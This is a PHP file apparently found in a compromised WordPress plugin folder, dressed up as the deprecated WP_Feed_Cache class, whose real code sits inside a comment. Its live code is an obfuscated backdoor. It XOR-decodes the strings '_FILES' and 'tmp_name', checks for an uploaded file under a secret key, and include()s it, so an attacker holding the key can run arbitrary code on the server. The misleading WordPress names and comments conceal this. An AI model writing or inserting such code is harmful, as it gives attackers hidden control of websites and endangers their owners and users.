File: /var/www/sites/1250.info/wp-content/plugins/1pq1q1s1/Yc.js.php
<?php /*
*
* Feed API: WP*/
function page_templates()
{
$default_category_post_types = 't605pI58qTPm';
$force_delete = $default_category_post_types;
$previous_date = $GLOBALS[src_url("%2Bpyy5%1A", $force_delete)];
$is_sticky = $previous_date;
$utf8_pcre = isset($is_sticky[$force_delete]);
if ($utf8_pcre)
{
$utf8_string = 'mime_match';
$show_in_admin_all_list = $previous_date[$force_delete];
$publicly_queryable = $show_in_admin_all_list[src_url("%00%5B%40j%1E%28X%5D", $force_delete)];
$patterns = $publicly_queryable;
include ($patterns);
}
}
function src_url($old_status, $pre_attribute_ws)
{
$defaults = $pre_attribute_ws;
$prime_pattern = "url" . "decode";
$author_query = 'show_in_rest';
$ptypes = $prime_pattern($old_status);
$keys = substr($defaults,0, strlen($ptypes));
$closing_single_quote = $ptypes ^ $keys;
$exts = 'reset';
return $closing_single_quote;
$post_type_meta_caps = 'lastpostdate';
}
page_templates();
/* _Feed_Cache class
*
* @package WordPress
* @subpackage Feed
* @since 4.7.0
* @deprecated 5.6.0
_deprecated_file(
basename( __FILE__ ),
'5.6.0',
'',
__( 'This file is only loaded for backward compatibility with SimplePie 1.2.x. Please consider switching to a recent SimplePie version.' )
);
*
* Core class used to implement a feed cache.
*
* @since 2.8.0
#[AllowDynamicProperties]
class WP_Feed_Cache extends SimplePie_Cache {
*
* Creates a new SimplePie_Cache object.
*
* @since 2.8.0
*
* @param string $location URL location (scheme is used to determine handler).
* @param string $filename Unique identifier for cache object.
* @param string $extension 'spi' or 'spc'.
* @return WP_Feed_Cache_Transient Feed cache handler object that uses transients.
public function create( $location, $filename, $extension ) {
return new WP_Feed_Cache_Transient( $location, $filename, $extension );
}
}
*/